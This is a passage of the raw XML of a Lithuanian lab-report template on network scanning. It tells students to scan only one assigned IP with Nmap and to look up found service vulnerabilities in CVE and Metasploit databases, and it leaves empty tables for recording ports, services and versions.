                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">Surinkta informacija apie paslaugų </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>pažeidžiamumus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AA344A" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="629A94AB" w14:textId="68AEE25A" w:rsidR="00AA344A" w:rsidRPr="00607DC0" w:rsidRDefault="00AA344A" w:rsidP="003E737E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">Parengti </w:t>
            </w:r>
            <w:r w:rsidR="005B4650" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>išvadas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1878" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="625F5F55" w14:textId="77777777" w:rsidR="00220388" w:rsidRDefault="00220388" w:rsidP="003E737E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">Informacija apie </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>pažeidaimumus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>vulnerability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F465FAD" w14:textId="7B47B877" w:rsidR="00607DC0" w:rsidRPr="00607DC0" w:rsidRDefault="00607DC0" w:rsidP="003E737E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>PILDOMA TIK „</w:t>
            </w:r>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Jūsų gautas rezultatas</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C441B" w:rsidRPr="00607DC0" w14:paraId="31D00D4A" w14:textId="77777777" w:rsidTr="00220388">
        <w:trPr>
          <w:cnfStyle w:val="010000000000" w:firstRow="0" w:lastRow="1" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0"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00" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DC91060" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000010000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="1" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="741" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5586152E" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3559" w:type="pct"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="13E77715" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="159A8D41" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E33C6A" w14:textId="77777777" w:rsidR="005C441B" w:rsidRPr="00607DC0" w:rsidRDefault="005C441B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1C6E6E" w14:textId="07A85648" w:rsidR="00CC09C3" w:rsidRPr="00607DC0" w:rsidRDefault="00CC09C3" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C4068D" w14:textId="32EDB0A5" w:rsidR="005A6008" w:rsidRPr="00607DC0" w:rsidRDefault="00AA5BCE" w:rsidP="009E0593">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc258656089"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LABORATORINIO </w:t>
      </w:r>
      <w:r w:rsidR="005A6008" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DARBO ATASKAITOS DALIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCE597" w14:textId="42BCD183" w:rsidR="005A6008" w:rsidRPr="00607DC0" w:rsidRDefault="005A6008" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BE6F8C" w14:textId="77777777" w:rsidR="00AA5BCE" w:rsidRPr="00607DC0" w:rsidRDefault="00AA5BCE" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="288456CE" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc258656086"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Darbo eiga. Skenavimas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7802DB9F" w14:textId="1CFB6B7B" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Tinklo profilis – tai apimtis viso to, ką reikia atlikti. </w:t>
      </w:r>
      <w:r w:rsidR="008E1AD0" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratorinio metu </w:t>
      </w:r>
      <w:r w:rsidR="008E1AD0" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SKENUOJATE TIK VIENĄ IP</w:t>
      </w:r>
      <w:r w:rsidR="008E1AD0" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Šio</w:t>
      </w:r>
      <w:r w:rsidR="008F6494" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> laboratorinio </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>metu jums apimtį apibrėžia IP adresų grupės, kurios parodo, ko jums negalima tikrinti. Realiame pasaulyje tai gali būti netiksliai apibrėžiama ir jūs turėsite suvokti tai patys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B06B35" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0DA141" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Tinklo profilio lentelė yra būdas apjungti skenavimą ir dokumentų ruošimą, kad būtų apibrėžta apimtis, kurioje yra domenų pavadinimai, zonos perkėlimo detalės, svarbios pavadinimo serverio detalės ir tinklo strategija. Ši profilio lentelė tada naudojama kaip vadovas tikrinimo metu, papildoma, kai būtina, ir galiausiai pateikia apžvalgą galutinės ataskaitos skaitytojams ir sudarytojams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EFFBA7" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4596029F" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc258656087"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> naudojimas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Aptikti paslaugų </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pažeidžiamumai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Ieškoma CVE ir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų bazėse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A931908" w14:textId="097CAEDC" w:rsidR="0025697F" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4CEAB1" w14:textId="2ECF1E67" w:rsidR="00607DC0" w:rsidRPr="004B0F8F" w:rsidRDefault="00607DC0" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jūsų gautas rezultatas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37041362" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32686D12" w14:textId="4C97BC3C" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paslaugų sąrašas</w:t>
      </w:r>
      <w:r w:rsidR="004B1C5B" w:rsidRPr="00607DC0">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (skenuoto IP adreso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2D168A" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="right"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3742"/>
        <w:gridCol w:w="2734"/>
        <w:gridCol w:w="3158"/>
      </w:tblGrid>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="1E7346D5" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3BC6A584" w14:textId="47CED58F" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Prievadas</w:t>
            </w:r>
            <w:r w:rsidR="0021627E" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0021627E" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0021627E" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4EC89CAF" w14:textId="4EE91CE2" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Paslauga</w:t>
            </w:r>
            <w:r w:rsidR="0021627E" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0021627E" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>service</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="0021627E" w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="012FB65A" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00607DC0">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Versija</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="7212509C" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="47710C55"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56F2EBA3"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4046AAC6" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="7D646F11" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="43AB52FA"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1E9B26A6"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41268260" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025697F" w:rsidRPr="00607DC0" w14:paraId="21670B77" w14:textId="77777777" w:rsidTr="003E737E">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1105E959"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2AD5ACB6"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624F907E" w14:textId="77777777" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
